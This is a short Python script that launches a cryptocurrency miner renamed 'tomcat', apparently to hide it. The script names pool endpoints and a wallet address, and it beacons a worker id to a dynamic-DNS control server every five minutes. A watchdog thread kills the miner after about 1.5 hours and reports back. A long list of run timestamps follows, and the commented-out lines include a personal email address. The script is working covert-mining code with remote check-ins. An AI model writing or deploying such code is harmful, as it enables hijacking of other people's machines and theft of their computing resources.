import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:04.923857
#2018-02-17 16:05:06.768934
#2018-02-17 17:52:05.457661
#2018-02-17 19:41:05.266451
#2018-02-17 21:28:07.492179
#2018-02-17 23:12:06.152190
#2018-02-18 00:59:01.768970
#2018-02-18 02:47:06.183915
#2018-02-18 04:35:06.574278
#2018-02-18 06:26:05.110027
#2018-02-18 08:14:05.076800
#2018-02-18 10:02:07.081177
#2018-02-18 11:48:05.913616
#2018-02-18 13:33:06.510974
#2018-02-18 15:22:07.038382
#2018-02-18 17:11:05.882187
#2018-02-18 18:59:04.471260
#2018-02-18 20:45:08.735648
#2018-02-18 22:31:08.261210
#2018-02-19 00:19:06.914566
#2018-02-19 02:05:08.689956
#2018-02-19 03:53:01.687788
#2018-02-19 05:38:01.992035
#2018-02-19 07:26:01.768203
#2018-02-19 09:15:06.537234
#2018-02-19 11:04:06.683029
#2018-02-19 12:51:01.843198
#2018-02-19 14:38:09.117670
#2018-02-19 16:25:12.020973
#2018-02-19 18:13:08.290405
#2018-02-19 19:59:07.920570
#2018-02-19 21:49:05.512806
#2018-02-19 23:35:06.934617
#2018-02-20 01:21:03.749179
#2018-02-20 03:11:01.965053
#2018-02-20 04:58:02.187351
#2018-02-20 06:41:01.510277
#2018-02-20 08:26:07.061221
#2018-02-20 10:11:05.505722
#2018-02-20 11:56:01.683601
#2018-02-20 13:44:09.113018
#2018-02-20 15:31:10.101157
#2018-02-20 17:18:09.451069
#2018-02-20 19:07:01.556207
#2018-02-20 20:56:07.437975
#2018-02-20 22:42:01.352275
#2018-02-21 00:25:01.502900
#2018-02-21 02:12:02.214748
#2018-02-21 03:58:05.039095
#2018-02-21 05:47:01.951703
#2018-02-21 07:35:05.444994
#2018-02-21 09:20:01.342546
#2018-02-21 11:08:05.913685
#2018-02-21 12:55:05.611683
#2018-02-21 14:42:05.518877
#2018-02-21 16:28:11.211144
#2018-02-21 18:19:06.065412
#2018-02-21 20:05:09.322430
#2018-02-21 21:52:06.625856
#2018-02-21 23:40:02.956528
#2018-02-22 01:28:06.742135
#2018-02-22 03:16:05.742340
#2018-02-22 05:02:02.191407
#2018-02-22 06:44:04.069220
#2018-02-22 08:33:04.664701
#2018-02-22 10:20:01.796023
#2018-02-22 12:04:06.625960
#2018-02-22 13:50:09.102877
#2018-02-22 15:39:06.072980
#2018-02-22 17:25:05.552471
#2018-02-22 19:12:01.524072
#2018-02-22 21:04:07.955082
#2018-02-22 22:48:09.074196
#2018-02-23 00:35:07.248115
#2018-02-23 02:22:06.218753
#2018-02-23 04:12:05.547862
#2018-02-23 05:58:01.503113
#2018-02-23 07:32:01.599131
#2018-02-23 07:53:05.318700
#2018-02-23 09:43:05.840960
#2018-02-23 11:22:02.195946
#2018-02-23 12:47:10.978950
#2018-02-23 14:11:05.190253
#2018-02-23 15:47:08.387689
#2018-02-23 17:17:07.740576
#2018-02-23 18:51:07.981382
#2018-02-23 20:25:04.412539
#2018-02-23 22:00:01.898043
#2018-02-23 23:39:05.617285
#2018-02-24 01:17:05.158802
#2018-02-24 02:51:06.803461
#2018-02-24 04:25:07.013603
#2018-02-24 05:52:07.792986
#2018-02-24 07:28:01.570686
#2018-02-24 09:03:05.455713
#2018-02-24 10:50:03.827441
#2018-02-24 12:37:07.143536
#2018-02-24 14:26:03.386297
#2018-02-24 16:14:06.806058
#2018-02-24 18:07:07.604569
#2018-02-24 19:53:01.313111
#2018-02-24 21:37:05.442439
#2018-02-25 00:27:02.033986
#2018-02-25 04:10:05.351963
#2018-02-25 07:40:07.943533